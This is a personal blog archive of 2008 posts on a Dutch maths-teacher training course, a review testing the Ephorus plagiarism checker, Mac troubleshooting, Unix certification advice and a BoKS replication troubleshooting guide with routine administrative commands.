One of the (comparatively) recent trends in mathematics education is realistic calculation (realistisch rekenen). The proponents of this method reason that students don't benefit from simply repeating algorithms all day. Instead, they'd like assignments to relate to reality by way of providing a context. That ought to keep students motivated, while also keeping maths "tangible" for them.

For this report, students are asked to investigate the pros and cons of realistic maths.

This document is available as a .PDF document and can be downloaded here.



Dossieropdracht 4

This assignment is kind of similar to the first report: we will be re-learning various methods for division and for determining the square root of a number.

This document is available as a .PDF document and can be downloaded here.



Dossieropdracht 5

Remedial teaching is an important part of education. Not every child will immediately grasp the concepts that you are explaining and some will have a downright hard time understanding the materials. As teachers we will need to understand why students make the mistakes they do and we'll need to know how to address these problems.

For this assignment we'll be talking with kids, after taking a look at some of the mistakes they've made in their calculations. For my report I spoke with a few kids who'd recently done a test on coordinates.

This document is available as a .PDF document and can be downloaded here.



Dossieropdracht 6

Continuing the research into thinking mistakes, the student is given five separate situations to analyse. In each, people have made mistakes in their assumptions or calculations and it's up to the students to find and explain them.

This document is available as a .PDF document and can be downloaded here.



Dossieropdracht 7

The students are asked to do some book research on learning disabilities and disorders that may affect kids in learning mathematics.

This document is available as a .PDF document and can be downloaded here.



Dossieropdracht 8

For this assignment students will treat high school math education as a black box. We will be comparing the output of primary school with the output of high school to determine the process that takes place -in- high school. As input for our research we will be using the final exams of primary school and the final exams of maths education in the VMBO part of high school.

This document is available as a .PDF document and can be downloaded here.



Dossieropdracht 9

We continue our research of realistic math by researching contexts used to teach about negative numbers. This is one of the notorious subjects in teaching high school maths.

This document is available as a .PDF document and can be downloaded here.



Dossieropdracht 10

For our final report, we are asked to do a didactical analysis (didactische analyse) of the way that fractions, percentages and decimals are taught in high school. This starts off with some book research and ends with us poring through the books for the first three years of maths ed in high school. Nice :)

This document is available as a .PDF document and can be downloaded here.




kilala.nl tags: , , ,

View or add comments (curr. 0)

All my term papers for Student Care 1 (Project Zorgverbreding)

2008-04-21 09:01:00

In my third semester I only took one class, because I'd fallen behind in my work a little bit. Luckily, the semester's project Student Care (project zorgverbreding) wasn't very complicated.

In this course, students will explore the care for students with learning and personality disorders. ADHD, ADD, Asperger, Tourettes, Anorexia... You name it, we've got it. The assignment for each project team was to pick a number of disorders, each of which was to be studied on an individual basis. Each team member would then report on the specifics of his chosen disorder.

My chosen disorders (I accidentally picked two, instead of one) were anxiety (angststoornis) and mood disorders (stemmingstoornis, depression et al). Below you'll find my big report on the subject, two summary sheets and a flyer.



Individueel verslag

Each of the team's members was to compile a document on his chosen disorder. Mine covers anxieties and mood disorders.

This document is available as a .PDF document and can be downloaded here.



Informational flyer

The docent offered extra credit to each team for making additional, informational products. I took the time to create flyers for each of our disorders, based on the reports everyone'd written. My flyer is a compilation of the two summary sheets below.

This document is available as a .PDF document and can be downloaded here.



Summaries

In the course of our project, we were to hold a small presentation for other project teams. As a basis for this presentation, each group member wrote a summary of his materials.

These documents are available as .PDF documents and can be downloaded here and here.



Mind maps

In order to keep my research for this project organised, I've worked with so-called mind maps.

These mind maps are available as .PNG files and can be downloaded here and here.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Researching ancient mathematics

2008-04-20 14:16:00

Part of the 1482 print of Euclid's work.

This semester I'm taking the second year's course Geschiedenis 2 Vakgedeelte, which can be translated as History of math 2. Over the next two months we'll be taking a look at math through the ages, starting with the Egyptians and Babylonians.

As part of this course, each student is expected to write a short biography on one of the Great Mathematicians (tm). I was assigned Euclid (Euclides in dutch), which seems to be a very interesting topic. So far I've done some six hours of research and I've gotten a pretty good picture.

During my research I've run into some very cool things! Things that may be of interest to a lot of people :)

For instance, there's Rare Book Room.org. This website has gathered thousands and thousands of photographs of antique books. They've created a huge archive, so that mere mortals such as you and I can leaf through tomes that are normally kept in museums.

A 1482 print of Elements, by Euclid.

A 1613 print of Istoria e Dimostrazioni Intorno Alle Macchie Solari, by Galileo Galilei.

Another neat project is Euclid's elements of geometry by Richard Fitzpatrick. Mr Fitzpatrick has taken the 1883 Heiberg translation and used it to make a completely fresh english translation of Elements (Euclid's most famous work). You can download the book for free as a .PDF at the link provided, or you can fork over $28 to buy the hardcover print from Lulu.com. I'd say the print is definitely worth it! I've just ordered my copy, to support Mr Fitzpatrick's work.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Ephorus, anti-plagiarism software for teachers

2008-04-13 18:30:00

Recently, we were discussing a few anti-plagiarism measures over at the Scholieren.com forums. Plagiarism, of course, is a rather stupid and bad thing to do if you want your education to be worth anything.

One of the checks so far is to just take any suspect sentences and plonk them into Google. This actually works miraculously well, seeing how Google indexes the hell out of half the Internet. The only downside to this approach is that you really only ought to apply it to suspected plagiarism, because you really can't copy and paste a whole document into Google's search bar.

To make things easier, some people have tried their hand at making a Google frontend, but with little success. So we'll have to turn to commercial companies who have their proprietary front ends and search methods.

Enter Ephorus, stage left.

Ephorus anti-plagiarism

On their website, Ephorus boast about their services like any good marketeer would. The emphasis in the following is mine.

Never search for plagiarism yourself again? An end to all irritations and qualitatively better papers? No problem. With Ephorus, you can prevent plagiarism with no extra effort. Moreover, with this anti-plagiarism market leader, you will be assured of the best service and the lowest prices. With Ephorus, teaching will be fun again!

Not only teachers and students benefit from Ephorus. Examination boards also see an improvement in the quality of papers. And since teachers no longer lose precious time investigating possible plagiarism, more time can be devoted to education.

Alright, sounds like a sales pitch, right? :) You'll notice that I bolded out two fragments that are rather important: they make it sound like Ephorus is the end-all-be-all solution to spot plagiarism. Sadly, this is simply not true. I'll explain this in a little detail shortly, but the gist of it is that Ephorus only checks materials they have access to through the Internet (eg Google search) and from their own database.

Ironically, their best source of original texts and information are their own clients. By submitting a document for verification, the customer allows Ephorus to keep said document in their database for future reference. This is also why recently students have been clamouring about copyrights on their documents. While teachers and schools are made aware of the fact that documents will be stored indefinitely, students are never told such a thing. The only thing they see is an upload form that asks for their details. No warnings, no disclaimers, no nothing. I guess Ephorus leaves that up to their customers.

The legalities behind all this are debatable. There's such a thing as fair use for academic purposes, but one could reason that Ephorus' goals are not purely academic.

Toying with Ephorus: a cursory glance

My initial impressions of Ephorus were good! The interface looks clean, well designed and calm. There's nothing there to confuse you and it's a good example of form following function. The interface is divided into a few sections.

You will find screenshots of most parts of Ephorus at the bottom of this page.

So far I've found a few small nags with the Ephorus online interface.

All in all I'm well pleased with the Ephorus interface. It's user friendly enough and is pleasing to the eye.

Testing Ephorus on some real documents

Of course, what would a software review be without putting it through its paces?

I've selected a few documents from my own schoolwork and a few other sources and I've submitted them to Ephorus. These documents are:

Analysis 1, DO10: one of my original works and never before published on the Internet.
Statistics 1, DO5: one of my original works and available on my website since last year.
Border-line op school: a document written by one of my project team members at school. Never before published on the Internet. Also, at least 40% of the text was copied straight from books.
Pride and prejudice: well, we all know this book, right? The classic by Jane Austen which has been freely available on the Internet for years.

The first document came out as expected and only slight traces of "plagiarism" were found. It scored a 3%, 2% of which was attributed to other documents that I'd written. Ephorus has marked parts of my cover page and my student information as being straight copies, which isn't remarkable. The final 1% came from the fact that I had literally quoted one paragraph (properly cited by the way) from a book.

By turning up the strictness a notch, another 2% were added to my score. Apparently the words "Maar dat was niet het doel van" ("but that was not the goal of") were found on two separate pages on the Internet.

The second document I'd submitted came out as expected as well: 96%. Of course, I'd expected a 100%, because the file itself has been on my website for over half a year now. So that's a bit odd. What's even stranger is that the cover page and information that was picked up for the first document wasn't flagged at all this time.

Disturbingly, my group member's document scored a measly 3%, in spite of his liberal copying. This can only be attributed to the fact that Ephorus cannot and does not search through books. Ephorus only relies on digital resources that it has free access to.

Finally, Jane Austen's Pride and prejudice was properly picked up at 98%. It would've been scary if Ephorus'd missed out on this ^_^

Personally, I think that the look and feel of the reports are just right. They could've been much prettier, or have taken the original document's formatting into account, but I reckon that would detract from their purpose. The reports offer just what a professor would need.

Fiddling with the strictness controls shows me that it modifies the number of words that do NOT have to be similar in one sentence. By setting the level to "strict", Ephorus will also point out any lines that share a number of words (but not all of them) with another source.

In conclusion

Earlier, I promised to tell you why Ephorus isn't the end-all-be-all solution to plagiarism. And it's not something that only applies to Ephorus, but something that goes for all of its competitors as well.

This software does not search books, magazines, research papers and other published print.

Case in point: my classmate's document came through fine. This means that teachers will always need to be on the lookout for plagiarism anyway. Ephorus and its ilk are just a first barrier that documents need to get through. And it's in that respect that I quite like Ephorus.

I'm glad that the Ephorus team gave me the chance to try out their software. I'm convinced that it makes a nice addition to the teacher's toolbox, even if it doesn't save him much work.

Screenshots

(Eleven screenshots of the Ephorus interface were included here.)

The Ephorus name and logo are of course copyright of Ephorus. All my screenshots were taken using the demo version of their website.


kilala.nl tags: , , , ,

View or add comments (curr. 16)

Aw yea! More results for school

2008-04-10 15:03:00

As I wrote in one of the comments I got a 90% for our project about students with learning and personality disorders. That was awesome.

Well, today got even more awesome, because I just got my -second- 90%! /o/

Analysis 1 - Didactics (about the teaching of basic math) consisted of ten separate reports. They came back as five 90%'s, three 80%'s and two 70%'s.

I'm grinning from ear to ear here :D


kilala.nl tags: ,

View or add comments (curr. 0)

Oral defense of this semester's project

2008-04-09 11:05:00

Last Monday my project team had its appointment for our oral defense of our essays. This was the first time we've had to do such a thing, since most docents are happy just reading through our papers. In this case however, the teacher wanted to prod our minds a little with some additional questions.

We came well prepared, as each of us had researched the questions we'd been given. In my case, the teach wanted to know about two things:

1. How would you go about planning a big workload for a depressed child, say for example his final exams?

2. What needs to be done if a depressed child becomes the victim of harassment by his peers?

Our defense went very well, with each of us answering all the questions to the teach's satisfaction. We actually had a good time and there was no stress at all :) In the end we were told that we could count on a 90%, assuming he didn't find any flaws in our final process reports. Nice!

I have to say that the docent did come off quite wishy-washy. We'd told him no less than three times that our fifth group member had quit school and he was still surprised when there was no one to answer the questions about the guy's report in depth. Uhm yeah, we told you? He left? Which also explains why he was about to completely skip my part of the interview, since he thought I was the guy who left. Scatterbrained much? :/ Jeez!...


kilala.nl tags: , ,

View or add comments (curr. 1)

Tips for Microsoft Office

2008-03-07 00:03:00

Generating a table of contents

A few of my classmates have asked me questions about creating a table of contents in their Word documents. Most of my classmates appear to be creating their TOCs manually, by copying each chapter's title and adding a page number after it. Of course this manual process is prone to errors and it also takes up a lot of time. Every time that you make a change to the layout of your document, you'll have to completely redo the TOC.

Luckily, MS Word (and most other word processors) are capable of automatically generating a TOC for you! The clip below shows you how to do it.

The clip weighs in at 29MB, so it will take a little while to load.

TableContentsHOWTO.mov

Inserting pictures into your document

Another thing my classmates have asked me about, is how to insert pictures into their documents. The following clip (about 26MB) will show you the whole process.

WordPicturesHOWTO.mov


kilala.nl tags: , ,

View or add comments (curr. 0)

Interesting debate on work ethics

2008-02-23 15:55:00

Here's an interesting question for you: if we want our kids/students to put effort into their work, why don't we do the same? Isn't that a bit two-faced?

Case in point: my own studies. It's been suggested a few times that I'm working myself into my grave at school, by putting so much effort into each and every assignment and report.

It's true that, for most of my reports, I put in extra research that isn't needed. Without said research I feel that I'm doing a half-assed job, because I wouldn't completely understand the subject matter. I enjoy studying extra materials from a field that I'm only in the process of entering, because without them I feel less confident. I've even been complimented on my efforts by a teacher or two.

However, now people (both teachers and fellow students) are suggesting that I could save a lot of time by skipping all that research. "Just find the answers to the questions and move on." "Don't bother with all those nice looking reports." "Do you really think someone's going to read a 25 page paper every time you submit one?"

Now, I'm not disregarding their suggestions, because it's certainly true that I could do with a little spare time. Too much work and no play and all that. So yes, I will start accepting 60-70% as a good score as well.

However, the problem I have with all of this is that we would -love- to have our students go apeshit over their course material! We'd love it if they got totally enthused about maths, or english lit, or PE. So why are we so quick to take the "easy road" ourselves? That just feels illogical to me and actually a little bit like a betrayal as well.


kilala.nl tags: , ,

View or add comments (curr. 1)

A summary of "Identiteitsontwikkeling en leerlingbegeleiding"

2008-02-16 21:05:00

As I've said, one of the killer first year's courses is Kijk op leerlingen en leren. Aside from a number of term papers and research that need to be done, there's also a big exam.

This exam presents the students with a number of cases that they need to assess using the experience they've gained throughout the course. During the exam, students are allowed to refer to the course book, Identiteitsontwikkeling en leerlingbegeleiding by van der Wal, de Mooij and de Wilde.

Below, you'll find my summary of four of the book's chapters. I didn't have time to tackle the chapter on the development of intelligence.

My summary is compiled as a 50+ page .PDF document. You can download my summary here.


kilala.nl tags: , , ,

View or add comments (curr. 0)

All my term papers on Student Identity Development

2008-02-16 20:52:00

One of the killer courses in the first year of the teachers education at Hogeschool Utrecht is Kijk op leerlingen en leren. This course has a twofold focus and is tested in three separate ways. The two main subjects of this course are identity development in students and a new approach to teaching known as The New Learning (Het Nieuwe Leren).

Testing is done as follows:

  1. An exam on identity development in teens.
  2. Five term papers on identity development.
  3. A group project on Het Nieuwe Leren, with a bunch of papers as output.

To help prepare for the test, I've written a summary of the book that we used in class. The book in question is Identiteitsontwikkeling en leerlingbegeleiding by van der Wal, de Mooij and de Wilde. Here's the summary.

The page you're currently browsing features all of my term papers on identity development and all of the papers I wrote for the group project.



Dossier opdracht 1

As an introduction to this course all students are asked to look back at their own teenage years. They're asked to speak candidly about their days in high school, their sexual development and their identity as a teenager.

Since this document contains a lot of stuff that hits a bit too close to home, I won't be putting it up on my website.



Dossier opdracht 2

This paper contains a few assignments about chapter 2 from the course book. The chapter covers basic identity development, including the various influences that work on a teenager.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 3

This paper contains a few assignments about chapter 3 from the course book. The chapter covers the development of intelligence and learning processes.

I haven't done this one yet ^_^



Dossier opdracht 4

This paper contains a few assignments about chapter 4 from the course book. The chapter covers the sexual identity of teenagers and how they cope with the changes their body and mind go through.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 5

This paper contains a few assignments about chapter 5 from the course book. This chapter covers student guidance and counseling. It explains what to do with students who have learning problems, or various disabilities.

This document is available as a .PDF document and can be downloaded here.


Group project on The New Learning

The second, huge part of this project involved research into The New Learning, or Het Nieuwe Leren as it is known in the Netherlands. These "new" (or actually "reinvented") teaching methods have led to a lot of changes in the dutch educational system and, as you can imagine, to a lot of fighting as well.

Our group of four was asked to investigate various parts of Het Nieuwe Leren, including the didactical and historical backgrounds. We produced a number of documents, but you'll only find my own documents on this site.

The following documents are available for download:


kilala.nl tags: , , ,

View or add comments (curr. 0)

OS X 10.5.2 broke some stuff

2008-02-13 06:55:00

Well carp! It seems that going from 10.4.11 to 10.5.2 in one go has broken a few things on my Macbook. Most notably, my FileVault home directory refuses to mount D:

Checking things out with fsck and Disk Utility provides the following:

Checking catalog file.

Invalid key length.

Volume check failed.

Disk verification failed.

Ouch. Luckily the encrypted sparseimage will still mount, so I'm using rsync to copy all of my data out of the home directory. Thank Dog I have an external FW disk lying around. Also thank Dog that I made a backup recently :)
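
The copy itself is nothing fancy. A minimal sketch, where both volume names are placeholders for my mounted FileVault image and the FireWire disk:

rsync -av /Volumes/myhomedir/ /Volumes/FireWireDisk/homedir-rescue/

(Apple's bundled rsync also understands -E to bring extended attributes and resource forks along; on other rsync builds that flag means something else, so check the man page first.)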

Remember kids! Always make backups!

Also, it seems that the tablet driver for my Wacom Graphire4 is incompatible with 10.5.2 as well. It was working nicely with 10.5.1, but now it's borked out :( I guess I'll have to wait for an updated version.

Oh well... While my Macbook is copying all of my data, I'll go have breakfast.


kilala.nl tags: , , ,

View or add comments (curr. 0)

I taught my first class today

2008-02-07 15:50:00

The Cals College in IJsselstein

Oh. My. God. I was so nervous this morning, it's unbelievable!

This morning I headed over to the Cals College in IJsselstein, to teach a class for the first time ever-ever. Before that, I had an appointment with the school's student care coordinator, to discuss another school assignment. Fifteen minutes before my class, I was in pretty bad shape though. Crampy stomach, cold and clammy: also known as "nervous".

The same went for the first two minutes of my teaching: I had a shaky voice and kept losing track of my story. After that though, things were fine :)

The students in my classroom were nothing short of awesome. Just like my classmate had predicted, they were very kind ^_^ They were very attentive and they were fast on the uptake. They all managed to finish the whole stencil of assignments, with only a few making minor mistakes. I couldn't have wished for a better class.

(In dutch:) Class 1DLW, thank you so much for today! I'm really happy with how it went and couldn't have asked for a better class for my first lesson. Best of luck with school and maybe we'll meet again :)

One point of important feedback that Gineke gave me: at this level of education, the questions I ask to verify the students' learning process are too open. Instead of asking if everyone gets it, I should ask more closed questions to see if people give the correct answers. Were this VWO instead of VMBO (uni-prep as opposed to vocational school), -then- I could've asked open questions.

Of course, there was more feedback, but I'll put that in my report for school. This will be published in the School section in a few days.

Here's a snippet from the videotape I made for my portfolio.

NegGetal.mov


kilala.nl tags: , , ,

View or add comments (curr. 9)

A sneak peek into my class

2008-02-05 22:36:00

Here's a little taster of the stuff I'll be using in Thursday's math class. I'll be introducing the kids in a VMBO-BL class to the notion of negative numbers, which can be quite a challenge. I mean, how the heck do you explain to a twelve year old that there's something smaller than zero?

Of course, people will immediately point out things like temperatures, debt and years B.C. Thing is, those are only examples of negative numbers and they don't explain how or why. They just show that it's possible, but a child may not instinctively understand how these figures work.

So, this should prove to be interesting! The picture shown above is part of a stencil I'm putting together for the students. It's part of the first assignment they'll be doing, pointing out the height at which various objects reside. I'm very curious about how it'll work out :)


kilala.nl tags: , , , ,

View or add comments (curr. 2)

Our kids don't need to learn fractions

2008-02-02 08:41:00

Or apparently that's what prof. DeTurck of Pennsylvania-U thinks.

DeTurck does not want to abolish the teaching of fractions and long division altogether. He believes fractions are important for high-level mathematics and scientific research. But it could be that the study of fractions should be delayed until it can be understood, perhaps after a student learns calculus, he said. Long division has its uses, too, but maybe it doesn't need to be taught as intensely.

From:

USA Today

and

Good math, bad math

Of course, like many others I believe this notion to be nuts. Decimals have no meaning unless you know what fractions are. It'd be like handing a bunch of powertools to a carpenter's apprentice and asking him to build a house. Oh, you don't need to know what everything does, just get to work...

As a future maths teacher I'm scared by this idea. And it's not just limited to the US. A dutch prof by the name of Kees Hoogland shares DeTurck's opinion that kids should be learning less longhand maths and should instead be focusing on using the calculator. Why? Because they'd be stupid not to use the modern materials at their disposal. *sigh*

I've started a forum discussion about this, over at Ars. Obviously, it's gotten some pissed off responses ^_^

EDIT:

In response to my thread over at Ars, GwT has started a new thread asking how important math is in general.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

It's finally going to happen!

2008-01-30 18:05:00

Well, it's finally going to happen! I've been putting this off for a long while, but Marli kicked me hard enough to get over it.

I'm going to teach a class.

The very thought still makes my stomach do somersaults, it's silly really. This is exactly what I'm studying for, so I ought to be longing for this moment! Of course, I realize that stage fright is something completely natural, but to be putting it off for months on end is just stupid. But now it's going to happen! In part because Marli got me out of my rut and in part because I'll fail my VAKDID2 class if I don't D:

My classmate Gineke is giving me a huge break, by letting me teach this class to one of her first year's groups. She tells me they're absolute sweethearts, so I really have nothing to worry about.

In a week's time (OMG!DEADLINE!) I'll be introducing a group of first year's students to the concept of negative numbers. On the one hand this deadline's great, since it's putting some real pressure on me. On the other it's a bit scary, because I really have to push myself hard to make it.

I'm going to teach a class.

My very first time, in front of a room filled with youngsters that -aren't- there to listen to me talk about anime or Japan. My very first time, trying to educate the young. My very first time, making my career switch more real than it ever was! This is why I've been working my ass off the past few months. I need to remember to enjoy the experience and not just try to be perfect.

I'm going to teach a class.

Oh my!..


kilala.nl tags: , ,

View or add comments (curr. 6)

Closing the second semester

2008-01-23 10:14:00

So, the second semester has come and gone.

I've taken the only test on my list and I think it went fairly well. Unfortunately I'm well behind on my reports, meaning that I'll have to finish two courses next semester. Because of that, I've chosen to only follow one new course, which should give me enough free time to tie off any loose ends.

Luckily I've gotten some of my drive and energy back, so I'm motivated to keep going. Also, my EVE trial account will run out in a few days, so I'll be safe from that distraction as well. I -will- be getting a full account some day though. It really is an awesome game.


kilala.nl tags: ,

View or add comments (curr. 0)

Wacom Graphire4 tablet having driver troubles in Leopard

2008-01-21 12:04:00

Ever since I upgraded my Powermac to Leopard it's been having problems with my Wacom Graphire4 tablet. The tablet would work, but only in its very basic mode. I suspected driver issues, but couldn't figure out which driver to use.

I finally got it to work though. Here's how:

1. If you have a directory called "Pen Tablet" or "Wacom" in /Applications, go in there and run the uninstaller. Remove both the prefs and the software.

2. Go into /Library/Preferences and remove all mentions of "Wacom" or "Pen Tablet".

3. Go into /Library/Application Support and do the same.

4. Go into ~/Library/Preferences and do the same.

5. For good measure, use the Find function in Finder to search for other mentions of Wacom.

6. Download the proper driver over here.

7. Install the new driver.

It should work now :)
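If you'd rather not click through all those folders by hand, a find command can do the hunting for you. This is just a sketch (the search patterns and paths are my own guess at where the leftovers live), so review its output before you delete anything:

$ sudo find /Library/Preferences "/Library/Application Support" ~/Library/Preferences -iname "*wacom*" -o -iname "*pen tablet*"
$ # check the list it prints, then remove those leftovers by hand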


kilala.nl tags: , , ,

View or add comments (curr. 0)

iPhoto, not without its glitches

2008-01-14 09:56:00

Meh... iPhoto is not without its bugs, unfortunately. I'm busy copying a few gigs of pics from Japan to my Powermac. iPhoto keeps borking up the exports, saying that a number of files are locked due to activity. This lock appears to be taken away, once I give iPhoto the command to "revert to original" for the pics in question. It seems that the editing process in iPhoto doesn't always clean up its crap :/

This bug's changed a process that should've taken fifteen minutes into an hour's endeavour.


kilala.nl tags: , ,

View or add comments (curr. 0)

Certification tips for Unix sysadmins

2008-01-01 00:00:00

It takes at least a couple of years for a fledgling sys admin to build up his or her experience to a level where people will say: "Yeah! He's a good sysadmin.. He knows his way around the OS."

Most of your first two or three years (assuming that you start admining in college) will be spent either with your nose in the books (learning new stuff) or with your nose to the grindstone (practicing the new stuff). A lot of time will be spent on basic grunt work, combined with maybe a couple of nice projects and some programming. But at some point a dreaded new word will drop on you like a brick from up on high... from management level, that is...

_certification_

At first, official vendor certification may seem like a humongous task! Especially if you take a look at the requirements that the vendor publishes on its website and at the sheer volume of the prep-books available. I had the same problem! One day my Field Manager mentioned that official certificates would look good on my resume and that I should go order a book or two... Which I did... And subsequently tried to read three times over... And just could not get through...

You see, I made the fatal mistake of wanting to cram everything in my head before even setting a date for the exam. This gave me way too much slack, causing me to lose interest at least two times over. So, after a bit of coaching from one of my friends/colleagues I came to the following conclusion on how to prepare for certification.

1. Get some experience :) Don't try to get certified immediately after being introduced to a new OS.

2. Take a look at the vendor's requirements for the certificate. These are usually published on their website.

3. Order one, maybe two good study books. I've created a small list of which books are good and which ones should be avoided.

4. Make a rough guesstimate of how long you think you'll need to study. Don't make this any longer than two months, or else you'll simply lose interest.

5. Order an exam voucher from your vendor.

6. Schedule the exam.

7. Start studying.

There's also a couple of other things that can really help you get the knack of things, ensuring that you'll be absolutely ready for the exam:

* Ask your employer to provide a sandbox system: a simple, small server which you are free to tinker with, configure, play with and break. This is an invaluable study tool!

* Purchase an account for a practice exam website (or get your employer to pitch in). The guys at Unixporting.com provide damn good test exams for Solaris Sysadmin 1 and 2, at a low price!

Most important of all: don't sweat it! A little excitement or a couple of shivers are good, but honestly: the fate of the world does not rest on your shoulders. If you don't pass the exam, try, try and try again. :)

Good luck!


kilala.nl tags: , , , , ,

View or add comments (curr. 3)

Recommended Unix Sysadmin books

2008-01-01 00:00:00

When getting certified, one of the most important tools is your cram sessions. With books... You know: dead trees? Treeware? Those big leafy things you read?... But you gotta know which ones are good and which ones to avoid like the plague.

Sun Solaris SCSA 1 and 2

"Exam cram: Solaris 8 System Administrator" ~ Darrell L. Ambro, Coriolis press

478 pages, comes with a separate cram sheet with "everything you need to know for the exam".



Avoid this one. This is the book I bought at first, as it got some good reviews on Amazon.com. It was also the one that I tried getting through three times over *ugh*. Honestly, the book is written in a very dull style but, worst of all, it really isn't much of a cram book since the author misses almost all of the important stuff for the exams. Way too little detail, so I wouldn't recommend it to anyone but the starting Solaris sysadmin who needs somewhere to begin.

"Solaris: Sun Certified System Administrator for Solaris 8.0 study guide" ~ Global Knowledge, Osborne McGraw-Hill

892 pages, comes with CD containing practice exams and a digital copy of the book.



Now _this_ is what I'm talking about! My colleague Martijn recommended this book and it really _does_ cover everything you need to know to ace the exam, plus a little more. The authors don't brush over any subject and take on each and every topic in detail. Yes, it's a big book and it may take you a while to get through it, but it's worth it. The exams included on the CD are a bit dodgy and are only good for one, maybe two attempts. In any case I recommend that you go out and get an account for a practice exam site.

Sun SCNA (TCP/IP Network admin)

"Sun certified network administrator for Solaris 8 study guide" ~ Rick Bushnell, Sun Microsystems Press

462 pages, no extras



Martijn also tipped me off about this book; apparently he aced the test with it. I have to admit that the book _does_ take its time in explaining everything to you and that Rick doesn't leave out any details. I have to warn you though that the author also made a couple of mistakes, that he likes repetition (sometimes a little too much) and that at times he underestimates the exam (tells you that you don't need to know what he's about to explain, when you do). All in all a good book, but I'm not too crazy about it.


kilala.nl tags: , , , , ,

View or add comments (curr. 0)

LPI-101 summary

2008-01-01 00:00:00

In 2007 I got my LPI-1 certification. This certificate requires one to take two exams: LPI-101 and LPI-102. I've studied hard for both exams and created summaries of all of the stuff I had to learn. I thought I'd share my summaries with all of the other LPI students. I hope they are useful to you!


kilala.nl tags: , , , , ,

View or add comments (curr. 1)

SCNA summary

2008-01-01 00:00:00

Back in 2004, when I originally studied for my SCNA certification, I wrote a big summary based on the course books. I thought I'd share this summary with the rest of this world's students. Even though it was meant for the Solaris 8 SCNA exam, it should still be useful.


kilala.nl tags: , , , , ,

View or add comments (curr. 0)

LPI-102 summary

2008-01-01 00:00:00

In 2007 I got my LPI-1 certification. This certificate requires one to take two exams: LPI-101 and LPI-102. I've studied hard for both exams and created summaries of all of the stuff I had to learn. I thought I'd share my summaries with all of the other LPI students. I hope they are useful to you!


kilala.nl tags: , , , , ,

View or add comments (curr. 5)

Troubleshooting BoKS fault situations

2008-01-01 00:00:00

A PDF version of this document is available. Get it over here.

1.1 Verifying the proper functioning of a BoKS client

People have often asked me how one can check whether a newly installed BoKS client is functioning properly. With these three easy steps you too can become a milliona..!!.... Oops... Wrong show! These easy steps will show you whether your new client is working like it should.

  1. Check the boks_errlog in $BOKS_var.
  2. Run cadm -l -f bcastaddr -h $client from the BoKS master (in a BoKS shell).
  3. Try to login to the new client.

If all three steps go through without error your system is as healthy as a very healthy good thing... or something.
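If you do this often, the three checks are easily strung together. The snippet below is only a sketch: the client name is a placeholder, it assumes you run it from a BoKS shell on the master, and it uses a plain ssh login as the "try to login" step.

CLIENT=newclient01                                # hypothetical client name
cadm -l -f bcastaddr -h $CLIENT                   # step 2: master-to-client BoKS communication
ssh $CLIENT "tail -20 /var/opt/boksm/boks_errlog" \
    && echo "login OK"                            # steps 1 and 3 in one go: log in and peek at the errlog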

1.2 SCENARIO: The BoKS master is not replicating to a replica (or all replicas)

Since one or more of the replicas are out of sync, login attempts by users may fail, assuming that the BoKS client on the server in question was looking at the out-of-sync BoKS replica. Other nasty stuff may also occur.

Standard procedure is to follow these steps:

  1. Check the status of all BoKS replicas.
  2. Check BoKS error logs on the master and the replica(s).
  3. Try a forced database download.
  4. Check BoKS replication processes to see if they are all running.
  5. Check the master queue, using the boksdiag fque -master command.
  6. Check BoKS communications, using the cadm command.
  7. Check node keys.
  8. Check the replica server's definition in the BoKS database.
  9. Check the BoKS configuration on the replica.
  10. Debug replication processes.

All commands are run in a BoKS shell, on the master server unless specified otherwise.

1. Check the status of all BoKS replicas.

# /opt/boksm/sbin/boksadm -S boksdiag list

The output contains the following fields:

Since last pckt: The amount of minutes/seconds since the BoKS master last sent a communication packet to the respective replica server. This amount should never exceed more than a couple of minutes.

Since last fail: The amount of days/hours/minutes since the BoKS master was last unable to update the database on the respective replica server. If an amount of a couple of hours is listed, you'll know that the replica server had a recent failure.

Since last sync: Shows the amount of days/hours/minutes since BoKS last sent a database update to the respective replica server.

Last status: Yes indeed! The last known status of the replica server in question. OK means that the server is running perfectly and that updates are received. Loading means that the server was just restarted and is still loading the database or any updates. Down indicates that the replica server is down or even dead.

2. Check BoKS error logs on the master and the replica(s).

This should be pretty self-explanatory. Read the /var/opt/boksm/boks_errlog file on both the master and the replicas to see if you can detect any errors there. If the log file does mention something about the hosts involved, you should be able to find the cause of the problem pretty quickly.

3. Try a forced database download.

Keon> boksdiag download -force $hostname

This will push a database update to the replica. Perform another boksdiag list to see if it worked. Re-read the BoKS error log file to see if things have cleared up.

4. Check BoKS replication processes to see if they are all running.

Keon> ps -ef | grep -i drainmast

This should show two drainmast processes running. If there aren't, you should see errors about this in the error logs and in Tivoli.

Keon> Boot -k

Keon> ps -ef | grep -i boks (kill any remaining BoKS processes)

Keon> Boot

Check to see if the two drainmast processes stay up. Keep checking for at least two minutes. If one of them crashes again, try the following:

Check to see that /opt/boksm/lib/boks_drainmast is still linked to boks_drainmast_d, which should be in the same directory. Also check to see that boks_drainmast_d is still the same file as boks_drainmast_d.nonstripped.

If it isn't, copy boks_drainmast_d to boks_drainmast_d.orig and then copy the non-stripped version over boks_drainmast_d. This will allow you to create a core file which is useful to TFS Technology.

Keon> Boot -k

Keon> Boot

Keon> ls -al /core

Check that the core file was just created by boks_drainmast_d.

Keon> Boot -k

Keon> cd /var/opt/boksm/data

Keon> tar -cvf masterspool.tar master_spool

Keon> rm master_spool/*

Keon> Boot

Things should now be back to normal. Send both the tar file and the core file to TFS Technology (support@tfstech.com).

5. Check the master queue.

Keon> boksdiag fque -master

If any messages are stuck, there is most likely still something wrong with the drainmast processes. You may want to try and restart the BoKS master software. Do NOT reboot the master server! Restart the software using the Boot command. If that doesn't help, perform the troubleshooting tips from step 4.

6. Check BoKS communications, using the cadm command.

Verify that the BoKS communication between the master and the replica itself is up and running.

Keon> cadm -l -f bcastaddr -h $replica

If this doesn't work, re-check the error logs on the client and proceed with step 7.

7. Check node keys.

On the replica system run:

Keon> hostkey

Take the output from that command and run the following on the master:

Keon> dumpbase | grep $hostkey

If this doesn't return the configuration for the replica server, the keys have become unsynchronized. If you make any changes you will need to restart the BoKS processes, using the Boot command.
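If you have (root) ssh access to the replica anyway, the copy-and-paste between the two boxes can be skipped. A sketch, assuming hostkey prints nothing but the key:

Keon> dumpbase | grep "`ssh $replica /opt/boksm/sbin/boksadm -S hostkey`"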

